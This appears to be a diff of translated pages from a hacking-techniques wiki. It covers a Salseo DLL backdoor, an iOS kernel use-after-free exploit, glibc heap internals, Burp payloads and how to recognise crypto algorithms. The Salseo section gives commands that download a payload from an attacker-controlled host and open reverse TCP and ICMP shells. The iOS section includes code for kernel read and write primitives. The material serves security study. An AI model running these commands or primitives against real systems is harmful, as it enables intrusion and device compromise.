### **获取 ICMP 反向 shell编码的 dll 已经在受害者内部)**
**这次你需要一个特殊的工具在客户端接收反向 shell。下载** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
#### **禁用 ICMP 回复:**
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
#### 执行客户端:
```
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
```
#### 在受害者内部让我们执行salseo操作
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
```
## 编译 SalseoLoader 为导出主函数的 DLL
使用 Visual Studio 打开 SalseoLoader 项目。
### 在主函数之前添加: \[DllExport]
![](<../images/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
### 为此项目安装 DllExport
#### **工具** --> **NuGet 包管理器** --> **管理解决方案的 NuGet 包...**
![](<../images/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
#### **搜索 DllExport 包(使用浏览选项卡),并按安装(并接受弹出窗口)**
![](<../images/image (4) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
在你的项目文件夹中出现了文件: **DllExport.bat** 和 **DllExport_Configure.bat**
### **卸载** DllExport
**卸载**(是的,这很奇怪,但相信我,这是必要的)
![](<../images/image (5) (1) (1) (2) (1).png>)
### **退出 Visual Studio 并执行 DllExport_configure**
只需 **退出** Visual Studio
然后,转到你的 **SalseoLoader 文件夹** 并 **执行 DllExport_Configure.bat**
选择 **x64**(如果你打算在 x64 环境中使用它,那是我的情况),选择 **System.Runtime.InteropServices**(在 **DllExport 的命名空间中**)并按 **应用**
![](<../images/image (7) (1) (1) (1) (1).png>)
### **再次使用 Visual Studio 打开项目**
**\[DllExport]** 不应再标记为错误
![](<../images/image (8) (1).png>)
### 构建解决方案
选择 **输出类型 = 类库**(项目 --> SalseoLoader 属性 --> 应用程序 --> 输出类型 = 类库)
![](<../images/image (10) (1).png>)
选择 **x64** **平台**(项目 --> SalseoLoader 属性 --> 构建 --> 平台目标 = x64
![](<../images/image (9) (1) (1).png>)
**构建** 解决方案: 构建 --> 构建解决方案(在输出控制台中将出现新 DLL 的路径)
### 测试生成的 Dll
复制并粘贴 Dll 到你想测试的位置。
执行:
```
rundll32.exe SalseoLoader.dll,main
```
如果没有错误出现,您可能拥有一个功能正常的 DLL
## 使用 DLL 获取 shell
不要忘记使用 **HTTP** **服务器** 并设置 **nc** **监听器**
### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
{{#include ../banners/hacktricks-training.md}}

4
src/binary-exploitation/arbitrary-write-2-exec/README.md
View File

@ -1 +1,3 @@
# 任意写入 2 执行
# Arbitrary Write 2 Exec
{{#include /banners/hacktricks-training.md}}

90
src/binary-exploitation/ios-exploiting.md
View File

@ -1,46 +1,48 @@
# iOS Exploiting
## Physical use-after-free
{{#include /banners/hacktricks-training.md}}
## 物理使用后释放
这是来自[https://alfiecg.uk/2024/09/24/Kernel-exploit.html](https://alfiecg.uk/2024/09/24/Kernel-exploit.html)的帖子摘要,此外关于使用此技术的漏洞的更多信息可以在[https://github.com/felix-pb/kfd](https://github.com/felix-pb/kfd)中找到。
### Memory management in XNU <a href="#memory-management-in-xnu" id="memory-management-in-xnu"></a>
### XNU中的内存管理 <a href="#memory-management-in-xnu" id="memory-management-in-xnu"></a>
iOS上用户进程的**虚拟内存地址空间**范围从**0x0到0x8000000000**。然而,这些地址并不直接映射到物理内存。相反,**内核**使用**页表**将虚拟地址转换为实际的**物理地址**。
#### Levels of Page Tables in iOS
#### iOS中的页表级别
页表分为三个层次进行分层组织:
页表以三层的层次结构组织:
1. **L1 Page Table (Level 1)**:
1. **L1页表第1级**
* 这里的每个条目表示一个大范围的虚拟内存。
* 它覆盖**0x1000000000字节**(或**256 GB**)的虚拟内存。
2. **L2 Page Table (Level 2)**:
2. **L2页表第2级**
* 这里的一个条目表示一个较小的虚拟内存区域,具体为**0x2000000字节**32 MB
* 如果L1条目无法映射整个区域它可能指向L2表。
3. **L3 Page Table (Level 3)**:
3. **L3页表第3级**
* 这是最细的级别,每个条目映射一个单独的**4 KB**内存页。
* 如果需要更细粒度的控制L2条目可以指向L3表。
#### Mapping Virtual to Physical Memory
#### 虚拟到物理内存的映射
* **Direct Mapping (Block Mapping)**:
* 页表中的某些条目直接**映射一系列虚拟地址**到一系列连续的物理地址(就像快捷方式)。
* **Pointer to Child Page Table**:
* 如果需要更细的控制,一个级别中的条目(例如L1可以指向下一个级别的**子页表**(例如L2
* **直接映射(块映射)**
* 页表中的某些条目直接**将一系列虚拟地址**映射到一系列连续的物理地址(就像快捷方式)。
* **指向子页表的指针**
* 如果需要更细的控制一个级别中的条目例如L1可以指向下一个级别的**子页表**例如L2
#### Example: Mapping a Virtual Address
#### 示例:映射虚拟地址
假设你尝试访问虚拟地址**0x1000000000**
1. **L1 Table**:
1. **L1表**
* 内核检查与此虚拟地址对应的L1页表条目。如果它有一个**指向L2页表的指针**则转到该L2表。
2. **L2 Table**:
2. **L2表**
* 内核检查L2页表以获取更详细的映射。如果此条目指向**L3页表**,则继续到那里。
3. **L3 Table**:
3. **L3表**
* 内核查找最终的L3条目该条目指向实际内存页的**物理地址**。
#### Example of Address Mapping
#### 地址映射示例
如果你将物理地址**0x800004000**写入L2表的第一个索引
@ -51,35 +53,35 @@ iOS上用户进程的**虚拟内存地址空间**范围从**0x0到0x8000000000**
* 虚拟地址范围**0x1000000000 -> 0x1002000000**中的每个4 KB页面将由L3表中的单独条目映射。
### Physical use-after-free
### 物理使用后释放
**物理使用后释放**UAF发生在
1. 一个进程**分配**了一些内存作为**可读和可写**。
2. **页表**被更新以将此内存映射到进程可以访问的特定物理地址。
3. 该进程**释放**(释放)内存。
4. 然而,由于一个**错误**,内核**忘记从页表中删除映射**,尽管它将相应的物理内存标记为可用
4. 然而,由于一个**错误**,内核**忘记从页表中删除映射**,尽管它将相应的物理内存标记为已释放
5. 内核随后可以**重新分配这块“释放”的物理内存**用于其他目的,例如**内核数据**。
6. 由于映射未被删除,进程仍然可以**读写**物理内存。
6. 由于映射未被删除,进程仍然可以**读写**这块物理内存。
这意味着进程可以访问**内核内存的页面**,这些页面可能包含敏感数据或结构,可能允许攻击者**操纵内核内存**。
### Exploitation Strategy: Heap Spray
### 利用策略:堆喷射
由于攻击者无法控制哪些特定的内核页面将分配给释放的内存,他们使用一种称为**堆喷射**的技术:
由于攻击者无法控制哪些特定的内核页面将分配给释放的内存,他们使用一种称为**堆喷射**的技术:
1. 攻击者在内核内存中**创建大量IOSurface对象**。
2. 每个IOSurface对象在其字段之一中包含一个**魔法值**,使其易于识别。
3. 他们**扫描释放的页面**查看这些IOSurface对象是否落在释放的页面上。
4. 当他们在释放的页面上找到一个IOSurface对象时他们可以使用它来**读写内核内存**。
2. 每个IOSurface对象在其字段中包含一个**魔法值**,使其易于识别。
3. 他们**扫描释放的页面**查看这些IOSurface对象是否落在释放的页面上。
4. 当他们在释放的页面上找到一个IOSurface对象时他们可以用它来**读写内核内存**。
关于此的更多信息[https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups)。
关于此的更多信息请参见[https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups)。
### Step-by-Step Heap Spray Process
### 步骤堆喷射过程
1. **Spray IOSurface Objects**: 攻击者创建许多带有特殊标识符“魔法值”的IOSurface对象。
2. **Scan Freed Pages**: 他们检查是否有任何对象已在释放的页面上分配。
3. **Read/Write Kernel Memory**: 通过操纵IOSurface对象中的字段他们获得在内核内存中执行**任意读写**的能力。这使他们能够:
1. **喷射IOSurface对象**攻击者创建许多带有特殊标识符“魔法值”的IOSurface对象。
2. **扫描释放的页面**他们检查是否有任何对象已在释放的页面上分配。
3. **读/写内核内存**通过操纵IOSurface对象中的字段他们获得在内核内存中执行**任意读写**的能力。这使他们能够:
* 使用一个字段**读取内核内存中的任何32位值**。
* 使用另一个字段**写入64位值**,实现稳定的**内核读/写原语**。
@ -138,25 +140,25 @@ free(surfaceIDs);
return 0;
}
```
### 使用IOSurface实现内核读/写
### Achieving Kernel Read/Write with IOSurface
在内核内存中控制一个IOSurface对象映射到一个可从用户空间访问的已释放物理页面我们可以将其用于**任意内核读写操作**。
在内核内存中控制一个 IOSurface 对象(映射到一个可从用户空间访问的已释放物理页面)后,我们可以将其用于 **任意内核读写操作**
**IOSurface中的关键字段**
**IOSurface 中的关键字段**
IOSurface对象有两个关键字段
IOSurface 对象有两个关键字段:
1. **使用计数指针**:允许**32位读取**。
2. **索引时间戳指针**:允许**64位写入**。
1. **使用计数指针**:允许 **32 位读取**
2. **索引时间戳指针**:允许 **64 位写入**
通过覆盖这些指针,我们将其重定向到内核内存中的任意地址,从而启用读/写功能。
#### 32位内核读取
#### 32 位内核读取
要执行读取:
1. 将**使用计数指针**覆盖为指向目标地址减去0x14字节的偏移量。
2. 使用`get_use_count`方法读取该地址的值。
1. 将 **使用计数指针** 覆盖为指向目标地址减去 0x14 字节的偏移量。
2. 使用 `get_use_count` 方法读取该地址的值。
```c
uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) {
uint64_t args[1] = {surfaceID};
@ -193,11 +195,13 @@ set_indexed_timestamp(info.client, info.surface, value);
iosurface_set_indexed_timestamp_pointer(info.object, orig);
}
```
#### 利用流程回顾
#### Exploit Flow Recap
1. **触发物理使用后释放**: 可重用的空闲页面。
2. **喷IOSurface对象**: 在内核内存中分配许多具有唯一“魔法值”的IOSurface对象。
3. **识别可访问的IOSurface**: 找到一个在你控制的已释放页面上的IOSurface。
2. **喷IOSurface对象**: 在内核内存中分配许多具有唯一“魔法值”的IOSurface对象。
3. **识别可访问的IOSurface**: 找到一个在你控制的空闲页面上的IOSurface。
4. **滥用使用后释放**: 修改IOSurface对象中的指针以通过IOSurface方法启用任意**内核读/写**。
通过这些原语,利用提供了对内核内存的受控**32位读取**和**64位写入**。进一步的越狱步骤可能涉及更稳定的读/写原语这可能需要绕过额外的保护例如在较新的arm64e设备上的PPL
通过这些原语,漏洞提供了对内核内存的受控**32位读取**和**64位写入**。进一步的越狱步骤可能涉及更稳定的读/写原语这可能需要绕过额外的保护例如在较新的arm64e设备上的PPL
{{#include /banners/hacktricks-training.md}}

61
src/binary-exploitation/libc-heap/README.md
View File

@ -1,27 +1,29 @@
# Libc Heap
{{#include /banners/hacktricks-training.md}}
## Heap Basics
堆基本上是程序在请求数据时存储数据的地方,调用像 **`malloc`**、`calloc`... 这样的函数。此外,当这些内存不再需要时,可以通过调用 **`free`** 函数将其释放。
如图所示,它位于二进制文件加载到内存后的位置(查看 `[heap]` 部分):
如图所示,它位于二进制文件加载到内存后的地方(查看 `[heap]` 部分):
<figure><img src="../../images/image (1241).png" alt=""><figcaption></figcaption></figure>
### Basic Chunk Allocation
当请求将某些数据存储在堆中时,会为其分配堆的一部分空间。该空间将属于一个 bin并且仅为请求的数据 + bin 头的空间 + 最小 bin 大小偏移量保留给该块。目标是尽可能少地保留内存,而不使查找每个块的位置变得复杂。为此,使用元数据块信息来了解每个已用/空闲块的位置。
当请求在堆中存储某些数据时,会为其分配堆的一部分空间。该空间将属于一个 bin只有请求的数据 + bin 头的空间 + 最小 bin 大小偏移量将为该块保留。目标是尽可能少地保留内存,而不使查找每个块的位置变得复杂。为此,使用元数据块信息来了解每个已用/空闲块的位置。
根据使用的 bin有不同的方法来保留空间但一般方法如下
根据使用的 bin有不同的方法来保留空间但一般方法如下:
- 程序开始请求一定量的内存。
- 程序开始请求一定量的内存。
- 如果在块列表中有足够大的可用块来满足请求,则将使用该块。
- 这甚至可能意味着可用块的一部分将用于此请求,其余部分将添加到块列表中。
- 如果列表中没有可用块,但已分配的堆内存中仍有空间,堆管理器将创建一个新块。
- 如果没有足够的堆空间来分配新块,堆管理器会请求内核扩展分配给堆的内存,然后使用内存生成新块。
- 如果没有足够的堆空间来分配新块,堆管理器会请求内核扩展分配给堆的内存,然后使用这块内存生成新块。
- 如果一切都失败,`malloc` 返回 null。
请注意,如果请求的 **内存超过阈值****`mmap`** 将用于映射请求的内存。
请注意,如果请求的 **内存超过阈值**将使用 **`mmap`** 来映射请求的内存。
## Arenas
@ -29,9 +31,9 @@
为了解决这个问题ptmalloc2 堆分配器引入了“区域”,每个 **区域** 作为一个 **独立的堆**,具有 **自己的** 数据 **结构****互斥锁**,允许多个线程在不相互干扰的情况下执行堆操作,只要它们使用不同的区域。
默认的“主”区域处理单线程应用程序的堆操作。当 **新线程** 被添加时,堆管理器为它们分配 **次要区域** 以减少竞争。它首先尝试将每个新线程附加到未使用的区域,如果需要则创建新的区域,最多达到 32 位系统 CPU 核心数量的 2 倍和 64 位系统的 8 倍。一旦达到限制,**线程必须共享区域**,这可能导致潜在的竞争。
默认的“主”区域处理单线程应用程序的堆操作。当 **新线程** 被添加时,堆管理器为它们分配 **次要区域** 以减少竞争。它首先尝试将每个新线程附加到未使用的区域,如果需要则创建新的区域,最多为 32 位系统的 CPU 核心数量的 2 倍,64 位系统的 8 倍。一旦达到限制,**线程必须共享区域**,这可能导致竞争。
与使用 `brk` 系统调用扩展的主区域不同,次要区域使用 `mmap``mprotect` 创建“子堆”,以模拟堆行为,从而在多线程操作中灵活管理内存
与使用 `brk` 系统调用扩展的主区域不同,次要区域使用 `mmap``mprotect` 创建“子堆”,以模拟堆行为,从而在管理多线程操作的内存时提供灵活性
### Subheaps
@ -50,7 +52,7 @@
### heap_info <a href="#heap_info" id="heap_info"></a>
此结构分配堆的相关信息。此外,堆内存在更多分配后可能不连续,此结构还将存储该信息。
此结构分配堆的相关信息。此外,堆内存在更多分配后可能不连续,此结构还将存储该信息。
```c
// From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/arena.c#L837
@ -71,12 +73,12 @@ char pad[-3 * SIZE_SZ & MALLOC_ALIGN_MASK];
### malloc_state
**每个堆**(主区域或其他线程区域)都有一个**`malloc_state`结构。**\
需要注意的是,**主区域 `malloc_state`** 结构是 **libc中的全局变量**因此位于libc内存空间中。\
在**线程的堆的 `malloc_state`** 结构中,它们位于**各自线程的“堆”内部**。
需要注意的是,**主区域`malloc_state`**结构是**libc中的全局变量**因此位于libc内存空间中。\
在**线程的堆的`malloc_state`**结构中,它们位于**各自线程的“堆”内部**。
从这个结构中有一些有趣的事情需要注意见下面的C代码
- `__libc_lock_define (, mutex);` 是为了确保这个堆中的结构一次只被一个线程访问
- `__libc_lock_define (, mutex);` 是为了确保这个堆中的结构一次只被一个线程访问
- 标志:
- ```c
@ -89,10 +91,10 @@ char pad[-3 * SIZE_SZ & MALLOC_ALIGN_MASK];
```
- `mchunkptr bins[NBINS * 2 - 2];` 包含指向**小型、大型和未排序的** **bins**的**第一个和最后一个块**的**指针**-2是因为索引0未使用
- 因此这些bins的**第一个块**将有一个**指向该结构的反向指针**而这些bins的**最后一个块**将有一个**指向该结构的前向指针**。这基本上意味着,如果你能**泄漏主区域中的这些地址**,你将获得指向**libc**中结构的指针。
- 结构 `struct malloc_state *next;` `struct malloc_state *next_free;` 是区域的链表
- `top` 块是最后一个“块”,基本上是**所有堆剩余空间**。一旦顶块“空”,堆就完全使用,需要请求更多空间。
- `last reminder` 块来自于没有可用的精确大小块的情况,因此一个更大的块被拆分,剩余部分的指针放置在这里。
- 因此这些bins的**第一个块**将有一个**指向此结构的反向指针**而这些bins的**最后一个块**将有一个**指向此结构的前向指针**。这基本上意味着,如果你能**泄漏主区域中的这些地址**,你将获得指向**libc**中结构的指针。
- 结构`struct malloc_state *next;``struct malloc_state *next_free;`是区域的链表
- `top`块是最后一个“块”,基本上是**所有堆剩余空间**。一旦顶块“空”,堆就完全使用,需要请求更多空间。
- `last reminder`块来自于没有可用的精确大小块的情况,因此一个更大的块被拆分,剩余部分的指针放置在这里。
```c
// From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/malloc.c#L1812
@ -142,7 +144,7 @@ INTERNAL_SIZE_T max_system_mem;
```
### malloc_chunk
该结构表示特定的内存块。不同字段对已分配和未分配的内存块具有不同的含义。
这个结构表示一块特定的内存。不同字段对已分配和未分配的块具有不同的含义。
```c
// https://github.com/bminor/glibc/blob/master/malloc/malloc.c
struct malloc_chunk {
@ -157,19 +159,19 @@ struct malloc_chunk* bk_nextsize;
typedef struct malloc_chunk* mchunkptr;
```
如前所述,这些块也有一些元数据,在此图中很好地表示出来
如前所述,这些块也包含一些元数据,在此图中很好地表示
<figure><img src="../../images/image (1242).png" alt=""><figcaption><p><a href="https://azeria-labs.com/wp-content/uploads/2019/03/chunk-allocated-CS.png">https://azeria-labs.com/wp-content/uploads/2019/03/chunk-allocated-CS.png</a></p></figcaption></figure>
元数据通常是0x08B表示当前块大小使用最后3位表示
- `A`如果为1则来自子堆如果为0则在主区域
- `A`如果为1则来自子堆如果为0则在主区域
- `M`如果为1则该块是使用mmap分配的空间的一部分而不是堆的一部分
- `P`如果为1则前一个块正在使用中
然后是用户数据的空间最后是0x08B用于指示块可用时的前一个块大小或在分配时存储用户数据
此外,当可用时,用户数据用于包含一些数据:
此外,当可用时,用户数据用于包含一些数据:
- **`fd`**:指向下一个块的指针
- **`bk`**:指向前一个块的指针
@ -178,13 +180,13 @@ typedef struct malloc_chunk* mchunkptr;
<figure><img src="../../images/image (1243).png" alt=""><figcaption><p><a href="https://azeria-labs.com/wp-content/uploads/2019/03/chunk-allocated-CS.png">https://azeria-labs.com/wp-content/uploads/2019/03/chunk-allocated-CS.png</a></p></figcaption></figure>
> [!NOTE]
> 注意以这种方式链接列表可以避免需要一个数组来注册每个块。
> [!TIP]
> 注意以这种方式链接列表可以避免需要一个数组来注册每个块。
### 块指针
当使用malloc时返回一个可以写入的内容的指针就在头部之后然而在管理块时需要一个指向头部元数据开始的指针。\
为这些转换使用这些函数:
为这些转换使用以下函数:
```c
// https://github.com/bminor/glibc/blob/master/malloc/malloc.c
@ -202,7 +204,7 @@ typedef struct malloc_chunk* mchunkptr;
#define MINSIZE \
(unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
```
### 对齐最小大小
### 对齐最小大小
指向块的指针和 `0x0f` 必须为 0。
```c
@ -259,7 +261,7 @@ req = (req + (__MTAG_GRANULE_SIZE - 1)) &
return request2size (req);
}
```
注意,在计算所需的总空间时,仅添加 `SIZE_SZ` 1 次,因为 `prev_size` 字段可以用来存储数据,因此只需要初始头部。
注意,在计算所需的总空间时,仅添加 `SIZE_SZ` 1 次,因为 `prev_size` 字段可以用来存储数据,因此只需要初始头部。
### 获取块数据并更改元数据
@ -409,11 +411,11 @@ ptr = malloc(0x10);
strcpy(ptr, "panda");
}
```
在主函数的末尾设置一个断点,让我们找出信息存储的位置:
在主函数结束时设置一个断点,让我们找出信息存储的位置:
<figure><img src="../../images/image (1239).png" alt=""><figcaption></figcaption></figure>
可以看到字符串 panda 存储在 `0xaaaaaaac12a0`(这是 malloc 在 `x0` 中给出的地址)。检查 0x10 字节之前,可以看到 `0x0` 表示 **前一个块未使用**(长度为 0而这个块的长度为 `0x21`
可以看到字符串 panda 存储在 `0xaaaaaaac12a0`(这是 malloc 在 `x0` 中给出的地址)。检查 0x10 字节之前,可以看到 `0x0` 表示 **前一个块未使用**(长度为 0而这个块的长度为 `0x21`
保留的额外空间0x21-0x10=0x11来自 **添加的头部**0x10而 0x1 并不意味着它被保留为 0x21B而是当前头部长度的最后 3 位具有一些特殊含义。由于长度始终是 16 字节对齐的(在 64 位机器上),这些位实际上永远不会被长度数字使用。
```
@ -473,7 +475,7 @@ return 0;
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
然后,在调用第一个线程,即调用 malloc 的线程,创建了一个新的 arena
然后,在调用第一个线程,即调用 malloc 的线程,创建了一个新的 arena
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
@ -501,3 +503,6 @@ heap-memory-functions/heap-functions-security-checks.md
- [https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/](https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/)
- [https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/)
{{#include /banners/hacktricks-training.md}}

19
src/burp-suite.md
View File

@ -1,19 +0,0 @@
{{#include ./banners/hacktricks-training.md}}
# 基本有效载荷
- **简单列表:** 仅包含每行一个条目的列表
- **运行时文件:** 在运行时读取的列表(不加载到内存中)。用于支持大列表。
- **大小写修改:** 对字符串列表应用一些更改(不变,转为小写,转为大写,转为专有名词 - 首字母大写,其余小写 -,转为专有名词 - 首字母大写,其余保持不变)。
- **数字:** 使用 Z 步长或随机生成从 X 到 Y 的数字。
- **暴力破解:** 字符集,最小和最大长度。
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : 用于执行命令并通过 DNS 请求获取输出的有效载荷到 burpcollab。
{{#ref}}
https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e
{{#endref}}
[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
{{#include ./banners/hacktricks-training.md}}

36
src/crypto-and-stego/cryptographic-algorithms/README.md
View File

@ -1,7 +1,5 @@
# 加密/压缩算法
## 加密/压缩算法
{{#include ../../banners/hacktricks-training.md}}
## 识别算法
@ -24,7 +22,7 @@
**CryptAcquireContext**
来自[文档](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta)**CryptAcquireContext**函数用于获取特定加密服务提供程序CSP内特定密钥容器的句柄。**此返回的句柄用于调用使用所选CSP的CryptoAPI**函数。
来自[文档](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta)**CryptAcquireContext**函数用于获取特定加密服务提供CSP内特定密钥容器的句柄。**此返回的句柄用于调用使用所选CSP的CryptoAPI**函数。
**CryptCreateHash**
@ -50,8 +48,8 @@
### 数据信息
如果代码没有任何显著的常量,它可能在**加载来自.data部分的信息**。\
你可以访问该数据,**将第一个dword分组**并在谷歌中搜索,就像我们在前面的部分所做的那样:
如果代码没有任何显著的常量,它可能在**从.data部分加载信息**。\
你可以访问该数据,**分组第一个dword**并在谷歌中搜索,就像我们在前面的部分所做的那样:
![](<../../images/image (531).png>)
@ -59,18 +57,18 @@
## RC4 **(对称加密)**
### 特
### 特
它由三个主要部分组成:
- **初始化阶段/**:创建一个**从0x00到0xFF的值表**总共256字节0x100。这个表通常称为**替代盒**或SBox
- **打乱阶段**:将**循环遍历之前创建的表**0x100次迭代的循环用**半随机**字节修改每个值。为了创建这些半随机字节使用RC4**密钥**。RC4**密钥**的长度可以**在1到256字节之间**但通常建议长度超过5字节。通常RC4密钥为16字节。
- **异或阶段**:最后,明文或密文与**之前创建的值进行异或**。加密和解密的函数是相同的。为此将对创建的256字节进行循环循环次数根据需要而定。这通常在反编译的代码中通过**%256模256**来识别。
- **异或阶段**:最后,明文或密文与**之前创建的值进行异或**。加密和解密的函数是相同的。为此将对创建的256字节进行循环执行必要的次数。这通常在反编译的代码中通过**%256模256**来识别。
> [!NOTE]
> [!TIP]
> **为了在反汇编/反编译代码中识别RC4你可以检查两个大小为0x100的循环使用密钥然后将输入数据与之前在两个循环中创建的256个值进行异或可能使用%256模256**
### **初始化阶段/替代盒:**(注意用作计数器的数字256以及在256个字符的每个位置写入0的方式
### **初始化阶段/替代盒:**注意数字256作为计数器的使用以及在256个字符的每个位置写入0的方式
![](<../../images/image (584).png>)
@ -84,11 +82,11 @@
## **AES (对称加密)**
### **特**
### **特**
- 使用**替代盒和查找表**
- 由于使用特定查找表值(常量),可以**区分AES**。_注意**常量**可以**存储**在二进制中**或动态**_**创建**。_
- **加密密钥**必须是**16的倍数**通常为32B并且通常使用16B的**IV**。
- 由于使用特定查找表值(常量),可以**区分AES**。_注意**常量**可以**存储**在二进制中**或动态**_ **创建**
- **加密密钥**必须**可被16整除**通常为32B并且通常使用16B的**IV**。
### SBox 常量
@ -96,7 +94,7 @@
## Serpent **(对称加密)**
### 特
### 特
- 很少发现某些恶意软件使用它但有例子Ursnif
- 根据其长度极长的函数简单判断算法是否为Serpent
@ -116,11 +114,11 @@
## RSA **(非对称加密)**
### 特
### 特
- 比对称算法更复杂
- 没有常量!(自定义实现难以确定)
- KANAL加密分析器未能显示RSA的提示因为它依赖于常量。
- KANAL一个加密分析器未能显示RSA的提示因为它依赖于常量。
### 通过比较识别
@ -131,7 +129,7 @@
## MD5 & SHA哈希
### 特
### 特
- 3个函数Init、Update、Final
- 初始化函数相似
@ -152,7 +150,7 @@
## CRC哈希
- 更小且更高效,因为它的功能是查找数据中的意外更改
- 更小且更高效,因为功能是查找数据中的意外更改
- 使用查找表(因此你可以识别常量)
### 识别
@ -161,13 +159,13 @@
![](<../../images/image (508).png>)
CRC哈希算法看起来像
一个CRC哈希算法看起来像
![](<../../images/image (391).png>)
## APLib压缩
### 特
### 特
- 没有可识别的常量
- 你可以尝试用python编写算法并在线搜索类似的东西

157
src/cryptography/certificates.md
View File

@ -1,157 +0,0 @@
# 证书
{{#include ../banners/hacktricks-training.md}}
## 什么是证书
**公钥证书**是用于加密的数字身份,用于证明某人拥有公钥。它包括密钥的详细信息、所有者的身份(主题)以及来自受信任机构(发行者)的数字签名。如果软件信任发行者并且签名有效,则可以与密钥的所有者进行安全通信。
证书主要由[证书颁发机构](https://en.wikipedia.org/wiki/Certificate_authority)CAs在[公钥基础设施](https://en.wikipedia.org/wiki/Public-key_infrastructure)PKI设置中颁发。另一种方法是[信任网络](https://en.wikipedia.org/wiki/Web_of_trust),用户直接验证彼此的密钥。证书的常见格式是[X.509](https://en.wikipedia.org/wiki/X.509)可以根据RFC 5280中概述的特定需求进行调整。
## x509 常见字段
### **x509证书中的常见字段**
在x509证书中几个**字段**在确保证书的有效性和安全性方面发挥着关键作用。以下是这些字段的详细说明:
- **版本号**表示x509格式的版本。
- **序列号**在证书颁发机构CA系统中唯一标识证书主要用于撤销跟踪。
- **主题**字段表示证书的所有者,可以是机器、个人或组织。它包括详细的身份识别,例如:
- **通用名称 (CN)**:证书覆盖的域。
- **国家 (C)**、**地方 (L)**、**州或省 (ST, S, 或 P)**、**组织 (O)** 和 **组织单位 (OU)** 提供地理和组织的详细信息。
- **区分名称 (DN)** 概括了完整的主题识别。
- **发行者**详细说明了谁验证并签署了证书,包括与主题类似的子字段。
- **有效期**由**生效时间**和**失效时间**时间戳标记,确保证书在某个日期之前或之后不被使用。
- **公钥**部分对证书的安全性至关重要,指定公钥的算法、大小和其他技术细节。
- **x509v3扩展**增强了证书的功能,指定**密钥使用**、**扩展密钥使用**、**主题备用名称**和其他属性,以微调证书的应用。
#### **密钥使用和扩展**
- **密钥使用**识别公钥的加密应用,例如数字签名或密钥加密。
- **扩展密钥使用**进一步缩小证书的使用案例例如用于TLS服务器身份验证。
- **主题备用名称**和**基本约束**分别定义证书覆盖的其他主机名以及它是否是CA或终端实体证书。
- 标识符如**主题密钥标识符**和**授权密钥标识符**确保密钥的唯一性和可追溯性。
- **授权信息访问**和**CRL分发点**提供验证发行CA和检查证书撤销状态的路径。
- **CT预证书SCTs**提供透明日志,对于公众信任证书至关重要。
```python
# Example of accessing and using x509 certificate fields programmatically:
from cryptography import x509
from cryptography.hazmat.backends import default_backend
# Load an x509 certificate (assuming cert.pem is a certificate file)
with open("cert.pem", "rb") as file:
cert_data = file.read()
certificate = x509.load_pem_x509_certificate(cert_data, default_backend())
# Accessing fields
serial_number = certificate.serial_number
issuer = certificate.issuer
subject = certificate.subject
public_key = certificate.public_key()
print(f"Serial Number: {serial_number}")
print(f"Issuer: {issuer}")
print(f"Subject: {subject}")
print(f"Public Key: {public_key}")
```
### **OCSP与CRL分发点的区别**
**OCSP** (**RFC 2560**) 涉及客户端和响应者共同检查数字公钥证书是否已被撤销,而无需下载完整的 **CRL**。这种方法比传统的 **CRL** 更有效后者提供被撤销证书序列号的列表但需要下载一个可能很大的文件。CRL 可以包含多达 512 个条目。更多细节可在 [这里](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm) 找到。
### **什么是证书透明性**
证书透明性通过确保 SSL 证书的发行和存在对域所有者、CA 和用户可见,帮助抵御与证书相关的威胁。其目标包括:
- 防止 CA 在未通知域所有者的情况下为域发行 SSL 证书。
- 建立一个开放的审计系统,以跟踪错误或恶意发行的证书。
- 保护用户免受欺诈证书的影响。
#### **证书日志**
证书日志是公开可审计的、仅附加的证书记录,由网络服务维护。这些日志提供加密证明以供审计使用。发行机构和公众都可以向这些日志提交证书或查询以进行验证。虽然日志服务器的确切数量并不固定,但预计全球不会超过一千个。这些服务器可以由 CA、ISP 或任何感兴趣的实体独立管理。
#### **查询**
要探索任何域的证书透明性日志,请访问 [https://crt.sh/](https://crt.sh)。
存储证书的不同格式各有其使用案例和兼容性。此摘要涵盖主要格式并提供转换指导。
## **格式**
### **PEM格式**
